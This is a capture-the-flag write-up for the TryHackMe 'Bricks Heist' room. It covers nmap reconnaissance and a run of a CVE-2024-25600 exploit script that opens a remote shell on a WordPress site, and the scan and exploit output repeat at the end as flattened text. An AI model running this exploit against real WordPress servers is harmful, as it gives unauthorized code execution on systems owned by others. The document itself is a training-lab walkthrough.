TryHack3M Bricks Heist

This is a writeup for https://tryhackme.com/r/room/tryhack3mbricksheist

Append the following line to the end of the file, replacing $IP with the room IP address:

sudo nano /etc/hosts

# Append to the last line with the format

$IP		bricks.thm

Reconnaissance

Run an Nmap scan to enumerate open ports and services:

nmap -sV -sC -A -p 22,80,443,3306 10.10.249.30

Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-15 17:51 BST
Nmap scan report for bricks.thm (10.10.249.30)
Host is up (0.00047s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     WebSockify Python/3.8.10
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Mon, 15 Apr 2024 16:51:17 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Mon, 15 Apr 2024 16:51:17 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp  open  ssl/http Apache httpd
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Brick by Brick
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after:  2025-04-02T11:59:14
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
	<REMOVED TO SAVE LENGTH>
MAC Address: 02:B2:AF:27:CD:65 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms bricks.thm (10.10.249.30)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.93 seconds

The scan output reveals:

Port 80: Python WebSockify server (not relevant for this exploit)
Port 443: Apache web server running WordPress 6.5
Port 3306: MySQL server (not relevant for this exploit)

Exploitation

Run the exploit script against the target:


root@ip-10-10-23-59:~# python3 CVE-2024-25600.py -u https://10.10.213.55

   _______    ________    ___   ____ ___  __ __       ___   ___________ ____  
____
  / ____/ |  / / ____/   |__ \ / __ \__ \/ // /      |__ \ / ____/ ___// __ \/ 
__ \
 / /    | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / 
/ /
/ /___  | |/ / /__/_____/ __// /_/ / __/__  __/_____/ __/____/ / /_/ / /_/ / /_/
/
\____/  |___/_____/    /____/\____/____/ /_/       
/____/_____/\____/\____/\____/
    
Coded By: K3ysTr0K3R --> Hello, Friend!

[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://10.10.213.55
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell> ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php

Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{DIY}

The flag is located in the 650c844110baced87e1606453b93f22a.txt file. So you can read it to get the flag.

TLDR; Add bricks.thm to /etc/hosts and use a WordPress bricks exploit to gain a shell and read the flag.

NextPicoCTF - Transformation

Last updated 11 months ago

nmap -sV -sC -A -p 22,80,443,3306 10.10.249.30 Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-15 17:51 BST Nmap scan report for bricks.thm (10.10.249.30) Host is up (0.00047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) 80/tcp open http WebSockify Python/3.8.10 | fingerprint-strings: | GetRequest: | HTTP/1.1 405 Method Not Allowed | Server: WebSockify Python/3.8.10 | Date: Mon, 15 Apr 2024 16:51:17 GMT | Connection: close | Content-Type: text/html;charset=utf-8 | Content-Length: 472 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 405</p> | <p>Message: Method Not Allowed.</p> | <p>Error code explanation: 405 - Specified method is invalid for this resource.</p> | </body> | </html> | HTTPOptions: | HTTP/1.1 501 Unsupported method ('OPTIONS') | Server: WebSockify Python/3.8.10 | Date: Mon, 15 Apr 2024 16:51:17 GMT | Connection: close | Content-Type: text/html;charset=utf-8 | Content-Length: 500 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 501</p> | <p>Message: Unsupported method ('OPTIONS').</p> | <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p> | </body> |_ </html> |_http-server-header: WebSockify Python/3.8.10 |_http-title: Error response 443/tcp open ssl/http Apache httpd |_http-generator: WordPress 6.5 | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache |_http-title: Brick by Brick | ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US | Not valid before: 2024-04-02T11:59:14 |_Not valid after: 2025-04-02T11:59:14 3306/tcp open mysql MySQL (unauthorized) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : <REMOVED TO SAVE LENGTH> MAC Address: 02:B2:AF:27:CD:65 (Unknown) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.8 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.47 ms bricks.thm (10.10.249.30) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 81.93 seconds

root@ip-10-10-23-59:~# python3 CVE-2024-25600.py -u https://10.10.213.55 _______ ________ ___ ____ ___ __ __ ___ ___________ ____ ____ / ____/ | / / ____/ |__ \ / __ \__ \/ // / |__ \ / ____/ ___// __ \/ __ \ / / | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / / / / /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ __/____/ / /_/ / /_/ / /_/ / \____/ |___/_____/ /____/\____/____/ /_/ /____/_____/\____/\____/\____/ Coded By: K3ysTr0K3R --> Hello, Friend! [*] Checking if the target is vulnerable [+] The target is vulnerable [*] Initiating exploit against: https://10.10.213.55 [*] Initiating interactive shell [+] Interactive shell opened successfully Shell> ls 650c844110baced87e1606453b93f22a.txt index.php kod license.txt phpmyadmin readme.html wp-activate.php wp-admin wp-blog-header.php wp-comments-post.php wp-config-sample.php wp-config.php wp-content wp-cron.php wp-includes wp-links-opml.php wp-load.php wp-login.php wp-mail.php wp-settings.php wp-signup.php wp-trackback.php xmlrpc.php Shell> cat 650c844110baced87e1606453b93f22a.txt THM{DIY}